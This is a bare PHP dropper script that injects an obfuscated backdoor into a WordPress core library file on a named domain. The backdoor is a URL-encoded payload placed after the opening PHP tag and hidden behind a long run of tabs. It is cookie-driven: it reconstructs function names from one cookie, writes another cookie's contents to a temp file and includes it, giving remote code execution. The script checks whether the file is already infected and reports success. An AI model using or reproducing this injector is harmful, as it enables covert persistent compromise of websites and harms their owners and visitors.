<?php  $path = '/home/hucscom/domains/huc99-s.com/private_html/wp-includes/sodium_compat/src/Core32/Int32.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28isset%28%24_COOKIE%5B3%5D%29%26%26isset%28%24_COOKIE%5B36%5D%29%29%7B%24c%3D%24_COOKIE%3B%24k%3D0%3B%24n%3D6%3B%24p%3Darray%28%29%3B%24p%5B%24k%5D%3D%27%27%3Bwhile%28%24n%29%7B%24p%5B%24k%5D.%3D%24c%5B36%5D%5B%24n%5D%3Bif%28%21%24c%5B36%5D%5B%24n%2B1%5D%29%7Bif%28%21%24c%5B36%5D%5B%24n%2B2%5D%29break%3B%24k%2B%2B%3B%24p%5B%24k%5D%3D%27%27%3B%24n%2B%2B%3B%7D%24n%3D%24n%2B6%2B1%3B%7D%24k%3D%24p%5B29%5D%28%29.%24p%5B11%5D%3Bif%28%21%24p%5B2%5D%28%24k%29%29%7B%24n%3D%24p%5B4%5D%28%24k%2C%24p%5B25%5D%29%3B%24p%5B13%5D%28%24n%2C%24p%5B17%5D.%24p%5B27%5D%28%24p%5B16%5D%28%24c%5B3%5D%29%29%29%3B%7Dinclude%28%24k%29%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');